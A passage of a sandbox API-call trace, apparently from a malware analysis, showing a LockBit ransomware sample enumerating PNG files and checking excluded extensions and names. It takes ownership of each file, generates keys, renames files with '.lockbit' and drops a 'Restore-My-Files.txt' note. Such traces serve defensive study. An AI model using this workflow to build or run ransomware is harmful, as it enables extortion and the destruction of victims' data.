lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.310] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.310] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.310] lstrcmpiW (lpString1="ntldr", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.311] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.311] lstrcmpiW (lpString1="bootsect.bak", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.311] lstrcmpiW (lpString1="autorun.inf", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.311] lstrcmpiW (lpString1="thumbs.db", lpString2="shadowonlyframe_buttongraphic.png") returned 1 [0087.311] lstrcmpiW (lpString1="iconcache.db", lpString2="shadowonlyframe_buttongraphic.png") returned -1 [0087.311] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0087.311] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png") returned=".png" [0087.311] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.311] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.311] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.311] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.312] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.312] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.312] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.lockbit") returned 86 [0087.312] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.313] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.313] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.313] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.313] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.314] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.314] RtlFreeAnsiString (AnsiString="\\") [0087.314] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3b8) returned 0x0 [0087.314] malloc (_Size=0x200) returned 0x77d800 [0087.314] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0087.314] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.314] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.314] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.315] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.315] CloseHandle (hObject=0x3b8) returned 1 [0087.315] free (_Block=0x77d800) [0087.315] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.315] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.315] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.315] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3462) returned 1 [0087.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.316] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.316] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0087.321] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.321] malloc (_Size=0xc2) returned 0x77d800 [0087.321] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0x0 [0087.322] free (_Block=0x77d800) [0087.322] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_buttongraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0087.322] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0087.322] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.322] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8f8753, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8f8753, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xd3e, dwReserved0=0x520150, dwReserved1=0x0, cFileName="shadowonlyframe_selectionsubpicture.png", cAlternateFileName="")) returned 1 [0087.323] lstrcmpiW (lpString1=".", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.323] lstrcmpiW (lpString1="..", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.323] PathFindExtensionW (pszPath="shadowonlyframe_selectionsubpicture.png") returned=".png" [0087.323] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.323] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.323] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.324] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.324] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.325] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.325] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.325] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] lstrcmpiW (lpString1="ntldr", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] lstrcmpiW (lpString1="bootsect.bak", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] lstrcmpiW (lpString1="autorun.inf", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] lstrcmpiW (lpString1="thumbs.db", lpString2="shadowonlyframe_selectionsubpicture.png") returned 1 [0087.325] lstrcmpiW (lpString1="iconcache.db", lpString2="shadowonlyframe_selectionsubpicture.png") returned -1 [0087.325] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\") returned="" [0087.325] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png") returned=".png" [0087.325] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.325] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.325] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.326] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.326] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.326] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.326] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.326] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.327] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.327] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.327] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.327] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.lockbit") returned 92 [0087.327] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.327] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.328] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.328] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.328] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.328] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.328] RtlFreeAnsiString (AnsiString="\\") [0087.328] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6b908 | out: TokenHandle=0x3d6b908*=0x3c0) returned 0x0 [0087.328] malloc (_Size=0x200) returned 0x77d800 [0087.328] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6b900 | out: TokenInformation=0x77d800, ReturnLength=0x3d6b900) returned 0x0 [0087.328] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6b6bc, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.329] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6b6bc, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.329] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.329] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6b6bc) returned 1 [0087.329] CloseHandle (hObject=0x3c0) returned 1 [0087.330] free (_Block=0x77d800) [0087.330] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shadowonlyframe_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0087.330] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.330] malloc (_Size=0x40068) returned 0x2031ed0 [0087.331] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x2031ee8 | out: lpFileSize=0x2031ee8*=3390) returned 1 [0087.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.332] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f04, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f04) returned 0x0 [0087.332] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.332] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.332] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2071f14, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2071f14) returned 0x0 [0087.332] ReadFile (in: hFile=0x3c0, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0087.346] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.346] malloc (_Size=0xce) returned 0x77d800 [0087.346] NtSetInformationFile (FileHandle=0x3c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xce, FileInformationClass=0xa) returned 0x0 [0087.347] free (_Block=0x77d800) [0087.347] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\shadowonlyframe_selectionsubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles") returned 1 [0087.347] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt") returned 65 [0087.347] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.347] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6e8ac499, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6e8ac499, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4f204eff, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc8e, dwReserved0=0x520150, dwReserved1=0x0, cFileName="shadowonlyframe_videoinset.png", cAlternateFileName="")) returned 1 [0087.347] lstrcmpiW (lpString1=".", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.347] lstrcmpiW (lpString1="..", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.347] PathFindExtensionW (pszPath="shadowonlyframe_videoinset.png") returned=".png" [0087.347] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.347] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.348] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.348] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.348] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.348] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.349] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.349] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.350] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.350] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.350] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.350] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.350] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] lstrcmpiW (lpString1="ntldr", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="shadowonlyframe_videoinset.png") returned -1 [0087.350] lstrcmpiW (lpString1="bootsect.bak", 